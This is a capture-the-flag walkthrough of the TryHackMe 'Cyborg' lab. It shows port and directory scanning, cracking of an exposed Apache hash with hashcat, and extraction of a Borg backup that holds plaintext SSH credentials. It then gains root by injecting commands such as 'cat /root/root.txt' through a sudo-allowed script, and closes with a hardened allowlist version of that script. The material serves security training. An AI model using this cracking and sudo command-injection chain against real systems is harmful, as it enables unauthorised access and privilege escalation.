TryHackMe: Cyborg
Cyborg introduced me to a new approach on things and taught me that we don’t always know everything, and that won’t weigh on our performance; what matters is what we do to get out of a situation that is new to us. What I notice in all these rooms is that it takes me more time to get inside the machines than to get the flags.
https://tryhackme.com/room/cyborgt8
Initial Enumeration
Nmap Scan
We start with our nmap scan:
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T4 -n -sC -sV -Pn -p- 10.10.158.87
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-11 17:10 GMT
Nmap scan report for 10.10.158.87
Host is up (0.082s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_ 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.28 seconds
Web 80
Nothing much in the scan, so we proceed to the web page on port 80:
Gobuster Scan
We get the default Apache page and the source code doesn’t have anything for us, so we can go ahead and run our gobuster scan:
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -x ".txt,.html,.php" -t 25 --timeout 20s -u http://10.10.158.87
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.158.87
[+] Method: GET
[+] Threads: 25
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,html,php
[+] Timeout: 20s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
...
/admin (Status: 301) [Size: 312] [--> http://10.10.158.87/admin/]
/etc (Status: 301) [Size: 310] [--> http://10.10.158.87/etc/]
/index.html (Status: 200) [Size: 11321]
/index.html (Status: 200) [Size: 11321]
/server-status (Status: 403) [Size: 277]
Progress: 18456 / 18460 (99.98%)
===============================================================
Finished
===============================================================
Two directories:
- admin
- etc
We’ll start by checking the admin directory:
There are 2 interesting things in the admin directory, the first being the Admins page with some chat logs:
And the other being an archive file that we download by pressing the download option in the archive dropdown menu:
Going to the other directory, etc, we find a folder called squid that has 2 files inside:
The squid.conf file didn’t have anything useful, but the passwd file had a hash:
To crack the hash we first need to know its type; to do so we will use the hash-identifier tool:
┌──(kali㉿kali)-[~/Desktop/final_archive]
└─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
Possible Hashs:
[+] MD5(APR)
--------------------------------------------------
Now we go to the hashcat hash types page and search for MD5(APR), which is the Apache $apr1$ format, hashcat mode 1600:
After that, we just run hashcat and crack the hash:
┌──(kali㉿kali)-[~/Desktop/final_archive]
└─$ hashcat -a 0 -m 1600 '$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
...
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.:squidward
...
Borg Backup
We now have a password but nowhere to use it yet, so we start looking around the archive file. When opening it, we see the following:
After digging around the files, most of them are encrypted except a README stating that the folders are part of a Borg Backup repository:
This is a Borg Backup repository.
See https://borgbackup.readthedocs.io/
The first step to go any further is to install the borgbackup package, found on their website; then we just follow the Quick Start page from the documentation. Since the creation steps were already done, we can start by listing the archives inside the repository:
┌──(kali㉿kali)-[~/Desktop]
└─$ borg list final_archive
Enter passphrase for key /home/kali/Desktop/final_archive:
music_archive Tue, 2020-12-29 14:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]
And we see the music_archive from before, whose hash we cracked, and following the steps we see that we can extract everything from the archive:
When we do, it asks for a passphrase, so we enter the password we got from the hash:
┌──(kali㉿kali)-[~/Desktop]
└─$ borg extract final_archive::music_archive
Enter passphrase for key /home/kali/Desktop/final_archive:
Shell as alex
It created a folder called home with the user alex inside:
┌──(kali㉿kali)-[~/Desktop/home/alex]
└─$ ls
Desktop Documents Downloads Music Pictures Public Templates Videos
Digging around, we find alex’s ssh credentials:
┌──(kali㉿kali)-[~/Desktop/home/alex]
└─$ cat Documents/note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
alex:S3cretP@s3
We can now log into alex’s machine and read the user flag:
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh alex@10.10.158.87
alex@10.10.158.87's password:
alex@ubuntu:~$ ls
Desktop Documents Downloads Music Pictures Public Templates user.txt Videos
alex@ubuntu:~$ cat user.txt
flag{REDACTED}
While enumerating, we see that we have sudo rights to run a file called backup.sh:
alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alex may run the following commands on ubuntu:
(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
We also have read permissions, so we check the file to see what it does, and we find 2 interesting pieces of code, the first being:
while getopts c: flag
do
case "${flag}" in
c) command=${OPTARG};;
esac
done
And the other being:
cmd=$($command)
echo $cmd
This means that we can pass any command through the ‘-c’ option and the script executes it. Running a simple whoami just to test it, we see that it runs as root:
alex@ubuntu:/etc/mp3backups$ sudo ./backup.sh -c 'whoami'
...
Backup finished
root
To get the root flag we don’t even need a root shell; a simple cat command will work just fine:
alex@ubuntu:/etc/mp3backups$ sudo ./backup.sh -c 'cat /root/root.txt'
...
Backup finished
flag{REDACTED}
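As an added example (not the room's backup.sh), here is how the -c handling could have been written so that a sudo NOPASSWD rule on the script would not hand out root: the option only selects a named hook from a fixed allowlist instead of being executed. The hook names and the BACKUP_DIR variable are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not the room's /etc/mp3backups/backup.sh. The original does
#   cmd=$($command)
# with $command taken straight from -c, so sudo runs the caller's string as root.
# This hypothetical rewrite keeps a -c option but only lets it pick a named hook
# from a fixed allowlist; the hook names and BACKUP_DIR are assumptions.

BACKUP_DIR="${BACKUP_DIR:-/etc/mp3backups}"

# Each hook is a fixed command; the caller chooses a branch, never the command.
run_hook() {
    case "$1" in
        report)  printf 'mp3 backup to %s finished\n' "$BACKUP_DIR" ;;
        verify)  if [ -d "$BACKUP_DIR" ]; then echo "backup dir present"
                 else echo "backup dir missing"; fi ;;
        none|"") : ;;
        *)       printf 'backup.sh: unknown hook "%s"\n' "$1" >&2; return 2 ;;
    esac
}

# Same getopts loop as the original, but the value is validated against the
# allowlist before anything uses it. Prints the accepted hook name on stdout.
select_hook() {
    hook=""
    OPTIND=1
    while getopts c: flag; do
        case "$flag" in
            c) hook=$OPTARG ;;
            *) return 2 ;;
        esac
    done
    case "$hook" in
        report|verify|none|"") printf '%s\n' "$hook" ;;
        *) printf 'backup.sh: refusing to run "%s"\n' "$hook" >&2; return 2 ;;
    esac
}

main() {
    hook=$(select_hook "$@") || return 2
    # ... the real backup work would go here ...
    echo "Backup finished"
    run_hook "$hook"
}

# Constructed demo: an allowlisted hook runs, an injected command is refused.
main -c report
main -c 'whoami' || echo "refused (status $?)"
```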